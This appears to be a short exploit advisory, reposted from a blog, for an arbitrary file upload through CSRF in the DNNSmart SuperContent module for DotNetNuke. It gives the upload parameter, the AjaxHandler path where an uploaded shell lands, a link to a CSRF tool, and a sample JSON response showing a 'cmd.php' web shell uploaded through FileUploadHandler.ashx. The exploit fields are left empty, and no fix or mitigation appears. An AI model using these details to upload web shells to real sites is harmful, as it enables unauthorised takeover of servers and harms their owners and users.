DNNSmart SuperContent Arbitari File Upload With Csrf
Vendor :
Google Dork : N/A
Exploit1 :
Exploit2 :
CSRF : http://secpriv8.com/tools/csrf/
POST File: files[]
Shell Path : site.com/[path]/AjaxHandler/ ur shell.aspx
Tested On : Android 9
Vuln Example :
{"files":[{"deleteType":"DELETE","deleteUrl":"http:\/\/site.com\/dotnetnuke\/desktopmodules\/DNNSmart_SuperContent\/AjaxHandler\/FileUploadHandler.ashx?file=cmd.php","error":"","name":"cmd.php","size":15749,"type":"","url":"http:\/\/site.com\/dotnetnuke\/desktopmodules\/DNNSmart_SuperContent\/AjaxHandler\/FileUploadHandler.ashx?file=cmd.php"}]}
Source : https://pastebin.com/6WU8u3MY
Posting Komentar